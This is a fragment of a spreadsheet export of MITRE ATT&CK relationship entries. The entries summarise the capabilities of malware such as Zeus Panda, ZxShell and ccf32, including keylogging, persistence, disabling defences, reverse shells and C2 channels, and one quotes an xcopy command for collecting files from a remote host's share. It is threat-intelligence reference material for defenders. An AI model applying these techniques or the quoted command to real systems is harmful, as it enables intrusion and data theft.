    <t>Zeus Panda</t>
  </si>
  <si>
    <t>malware--198db886-47af-4f4c-bff5-11b891f85946</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can hook GetClipboardData function to watch for clipboard pastes to collect.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--ce378e64-5802-4751-8b8e-d7bf68ce4c6a</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) obfuscates the macro commands in its initial payload.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>relationship--bfbde4cb-a8e5-4e55-8700-7d25b17ecad1</t>
  </si>
  <si>
    <t xml:space="preserve">[Zeus Panda](https://attack.mitre.org/software/S0330) can launch remote scripts on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)	</t>
  </si>
  <si>
    <t>relationship--9317c15e-44ae-4d00-9f2b-ad1b07ff52b5</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) hooks processes by leveraging its own IAT hooked functions.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--01e4bf9a-3d9c-4381-aa9c-cca73376c771</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) decrypts strings in the code during the execution process.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e6aed3c5-9f4a-4178-b03b-5805b2f61c81</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) has a command to delete a file. It also can uninstall scripts and delete files to cover its track.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--ba8900d2-1a18-4f44-916d-08b93dc74d9c</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) searches for specific directories on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--e8906575-d90c-4d56-9fb7-bba3560bbeba</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can download additional malware plug-in modules and execute them on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--4c0f441f-13b1-4b79-b658-e081d5143a94</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--df0784ed-8411-4215-bebc-51c6ac3bf5df</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) modifies several Registry keys under &lt;code&gt;HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\&lt;/code&gt; to disable phishing filters.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--a9a0ecce-239c-4666-94e9-ef1fb64cf796</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) encrypts strings with XOR. [Zeus Panda](https://attack.mitre.org/software/S0330) also encrypts all configuration and settings in AES and RC4.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--bc9a5286-98a6-4905-b4ce-8f4d958861b6</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks processes on the system and if they meet the necessary requirements, it injects into that process.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--da69efe7-e99e-4d79-a455-c59f4c087b22</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses PowerShell to download and execute the payload.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>relationship--0b77fa58-6fd7-4002-955e-e3e1705d54c2</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for running processes on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--39f3e098-ca5d-4dc4-9cbb-bc29148def30</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for the existence of a Registry key and if it contains certain values.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--d18d7fab-1f10-4b83-83e1-a288ec4db2bd</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) adds persistence by creating Registry Run keys.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--db6220f4-9e1c-487c-9b8d-e016565817e3</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can take screenshots of the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--4ab6eb52-821c-45da-b7d9-63840fe657cf</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--19f93e6a-a481-4f72-856a-879742a654e4</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</si>
  <si>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</si>
  <si>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relationship--dac8dcfd-e7e7-4b41-b100-07f95f6b0ba9</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>relationship--a5cbd480-0147-4e70-9551-03a2b5b8fdcb</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the current system time (UTC) and sends it back to the C2 server.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--9494b0d8-26d9-48ae-8dd1-c9d8966b23a0</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses HTTP for C2 communications.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>relationship--b3d3ab9f-03db-4982-b60e-9f7f224f1fc2</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can launch an interface where it can execute several commands on the victim’s PC.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>relationship--cbbfb291-9c39-4fab-a2ac-c1f076c7c367</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to upload files from a targeted system.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--a1b1aaab-021e-4d2e-9c3b-eaac41833a4e</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to leverage local and remote exploits to escalate privileges.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--b9ed53b8-71a5-44a3-90d1-2fb600991674</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) can enumerate files on a compromised host.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--6e1346fe-507c-4ab3-a254-ea00e226fafd</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) can download files to a compromised machine.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--55d5ccb4-b794-467b-b734-fa3763bbdf99</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has been encoded with Base64.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--2729dc4f-b327-4a13-a07c-39e8b1b39288</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to list processes.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--ae05ae0a-7806-491a-8350-33600df44d2a</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has the ability to use SMB for communication.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--717442d5-dd5a-4658-87e1-33f727dd1fa2</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) has used the .PNG file format for C2 communications.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--4ae58878-d6b9-4f0d-bca1-f2f3b5e2adce</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) can enumerate attached drives.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--be4909b2-ff92-4dca-b835-09df2b10adb2</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to clear system event logs.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--768ba293-130e-4f0e-935f-f477187524ae</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command called RunAs, which creates a new process as another user or process context.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--aa3e7625-07e1-474f-967a-15e26e1a193c</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) hooks several API functions to spawn system threads.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--405f7aa3-2ce8-455f-9718-c2525658c595</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can transfer files from a compromised host.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>relationship--5db19a58-c7ff-4de0-b9bd-9e3b247b2ff3</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can disable the firewall by modifying the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile&lt;/code&gt;.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--9121d8be-058d-4ee2-9372-62c6607dd8f4</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can kill AV products' processes.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--c28eced2-5070-4646-b178-22f4537124a4</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) is injected into a shared SVCHOST process.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--a275b407-099a-4f2c-954c-528cf61349f8</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to perform SYN flood attack on a host.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--dda297c6-2edc-47c5-b32b-0d4ef0f85be4</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) has been dropped through exploitation of CVE-2011-2462, CVE-2013-3163, and CVE-2014-0322.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>relationship--66fe07f5-fe08-4ad1-98b6-cb300007fe42</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can delete files from the system.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--7e7d5934-0e0d-4d9e-89d8-279bc05a6f77</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used FTP for C2 connections.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--a18f1ae0-dbc8-4f6d-9c88-ab284ce2bf0c</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to open a file manager and explorer on the system.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--49dbde7a-a8ac-4d86-8216-1055f7536467</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to transfer files from a remote host.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--ffffed15-5695-44b9-b85b-89ba8187415d</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to capture a remote computer's keystrokes using a keylogger.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--f0a91093-3827-49b0-82c4-a1c882f074cf</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) has a feature to create local user accounts.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>relationship--c9ad232a-2276-40b2-bf56-490fc6357cca</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can create Registry entries to enable services to run.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>relationship--713495d9-e481-4f48-af72-e3bfd474016b</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can leverage native API including &lt;code&gt;RegisterServiceCtrlHandler &lt;/code&gt; to register a service.RegisterServiceCtrlHandler </t>
  </si>
  <si>
    <t>relationship--eb7db180-08e0-4240-a1d4-b520fbe4dc8c</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can launch port scans.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--704355c5-4743-4fe1-bd64-b7012fe7c1d2</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can use ports 1985 and 1986 in HTTP/S communication.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>relationship--3a5c4e73-3657-470e-882b-563f3ca599e7</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command, ps, to obtain a listing of processes on the system.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--68d151ea-6dd8-4e6b-acd5-c998ebffc357</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can set up an HTTP or SOCKS proxy.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--2bd05bbf-886e-4211-8aab-63cd8581a695</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can query the netsvc group value data located in the svchost group Registry key.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--5acaf47e-4608-4548-81e8-368a2687844e</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has remote desktop functionality.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--a7ee1099-9380-4743-ba98-6590b65420b2</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used rundll32.exe to execute other DLLs and named pipes.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--abc5f1e1-82b7-4d5d-b623-ce0f3e91b9d3</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can capture screenshots.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--4b3274fe-1960-4d1e-91d1-2091e467c45b</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can create a new service for execution.(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>relationship--ed40dd97-0ad0-4501-8f1e-a4bd4625432d</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the local hostname, operating system details, CPU speed, and total physical memory.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--20f422e8-6244-46e3-8842-f5dc3e37568c</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the owner and organization information from the target workstation.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--6635f23e-99e9-4978-9924-ccf6c199f84f</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can check the services on the system.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--fd44d6f1-25c5-4365-8a68-323bfc0b3f22</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) supports functionality for VNC sessions.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--1fa0c726-0f55-4f10-8a31-184d760239c5</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to perform video device spying.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--aa9b33a5-81b2-4126-b8f5-0182ec365fc8</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used HTTP for C2 connections.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--334ab5f1-75dc-425b-9659-10d2b62b9cbc</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can launch a reverse command shell.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)(Citation: Secureworks BRONZEUNION Feb 2019)</t>
  </si>
  <si>
    <t>relationship--a322b9a0-57f8-4eda-a6f4-2adbc1376bfb</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can create a new service using the service parser function ProcessScCommand.(Citation: Talos ZxShell Oct 2014) </t>
  </si>
  <si>
    <t>relationship--9373e1b7-3164-4879-9b92-f3a629029eb2</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can collect data from a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--dfb3ddf9-7683-4d88-ba40-eab0f87a3a8c</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has used a XOR key to decrypt strings.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--f649505a-555f-4939-980e-916a511c3134</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can download and execute additional files.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--0bde7434-49de-40c4-906c-fc5f3bfc6d16</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has relied on victims to open a malicious attachment delivered via email.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--7e93778d-1f69-4705-b544-b0e80d889267</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has been disguised as a Windows security update service.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--452ebe8a-fc71-42e2-994f-2a974ab16c8d</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--0a3c7f91-6020-46f8-be45-d0a8cf86956e</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has been encoded to avoid detection from static analysis tools.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--4ee9fd95-d2c8-4d34-87d2-bf1f5ef54061</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has created a snapshot of running processes using `CreateToolhelp32Snapshot`.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--13a3b832-a680-4c50-b413-c8137a6a89b5</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can search the registry of a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--4e5de254-8dd4-46cd-a8af-8cdfd335e5f1</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has used scheduled tasks for persistence and execution.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--5859c58f-fc6a-4a08-ac8b-96fd21175814</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can search a compromised host to determine if it is running Windows Defender or Kasperky antivirus.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--382d78e9-c653-4d0d-aab6-c154152f6f1c</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--d095926f-b161-46ea-ac52-b7295ce42b80</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxxZ](https://attack.mitre.org/software/S1013) has collected the host name and operating system product name from a compromised machine.(Citation: Cisco Talos Bitter Bangladesh May 2022) </t>
  </si>
  <si>
    <t>relationship--16e1777b-af28-412b-bcc3-469aba0f8a87</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) can collect the username from a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--d979c181-32f5-4977-8ca9-30a1edc595c0</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) contains a copy of the OpenSSL library to encrypt C2 traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--e7077a73-991e-4660-a13d-fb30dc36fab1</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can run a copy of cmd.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--d9f924ec-aa93-48fd-aef6-2e545410f2d0</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can use a WMI script to achieve persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--bc249532-826d-4bc2-8b03-43f284fe609f</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) can be used to schedule a task on a system to be executed at a specific date or time.(Citation: TechNet At)(Citation: Linux at)</t>
  </si>
  <si>
    <t>relationship--d4d35e55-6a09-47ef-8de5-160468276025</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--d870ed48-a7df-4aee-af06-c58ee59432e7</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as "NVIDIA" to appear legitimate.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--506ed241-ba1e-47da-901a-d1943510d4b5</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to use the &lt;code&gt;WinExec&lt;/code&gt; API to execute malware on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--419b786c-a7db-4357-918c-aa1b883203ee</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to add itself to the Registry Run key for persistence.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--5266fdd9-f62e-4412-b5d0-d26ba6d5a1ab</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--79c46f52-743a-4a17-bede-aa003c03f6b1</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--5342c0fb-0f4d-456a-a7e7-525c60b7f82e</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to send system volume information to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--a6c20b07-57ea-46dd-aa71-93849b6b66ca</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--56465210-d279-4982-a9fa-94a69f5b0b80</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has used `xcopy \\&lt;target_host&gt;\c$\users\public\path.7z c:\users\public\bin\&lt;target_host&gt;.7z /H /Y` to archive collected files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--27fe3870-1ce3-4f62-be7c-6da08d09643c</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can be used to automatically collect files from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--13183327-ca7a-4237-98be-c4c7215bf3d3</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can collect files from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--0f19052c-5734-4521-91f4-1389e53d11ee</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can upload collected data and files to an FTP server.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--24a9d604-0e19-4458-953b-7985b862bfaa</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can delete files and folders from compromised machines.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--622370db-7550-4422-8470-225bd07582f7</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can parse collected files to identify specific file extensions.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--bd610e42-b791-4322-8451-5fab556b6c28</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day).(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--7888f7bb-92a8-4c5a-abbc-6dcc4ad3e149</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can temporarily store files in a hidden directory on the local host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--966ce7a3-4306-4003-89d8-9d6af89a0c2e</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has copied files to a remote machine infected with [Chinoxy](https://attack.mitre.org/software/S1041) or another backdoor.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--2650cd6f-c837-4889-9044-37e9649d7bf4</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can run on a daily basis using a scheduled task.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--b5582dcf-f58c-4420-a65d-186e2df9db8f</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) can determine the local time on targeted machines.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--3881653b-bd16-4eba-ab35-81da1872c5c8</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has used `cmd.exe` for archiving data and deleting files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--2f50eea4-aec7-4925-a8c6-2d0c6a4f481f</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) may be used to Base64 encode collected data.(Citation: TechNet Certutil)(Citation: LOLBAS Certutil)</t>
  </si>
  <si>
    <t>relationship--0f5462cb-ac39-49d1-848e-aefaaab321e3</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) has been used to decode binaries hidden inside certificate files as Base64 information.(Citation: Malwarebytes Targeted Attack against Saudi Arabia)</t>
  </si>
  <si>
    <t>relationship--5918cee6-c2f1-41be-ab96-36f3d17e5293</t>
  </si>
  <si>
    <t>31 July 2019</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to download files from a given URL.(Citation: TechNet Certutil)(Citation: LOLBAS Certutil)</t>
  </si>
  <si>
    <t>relationship--73f5c564-53b1-48bc-8cab-32fa4a608672</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</si>
  <si>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</si>
  <si>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relationship--542bb806-3e73-42f5-8a3e-86b498093f4b</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to delete files from the file system.(Citation: TechNet Del)</t>
  </si>
  <si>
    <t>relationship--d7d3cf5c-e541-4639-95c6-8cdea60b084d</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find files and directories with native functionality such as &lt;code&gt;dir&lt;/code&gt; commands.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>relationship--2c09a27c-2eea-4287-9908-964533234e71</t>
  </si>
  <si>
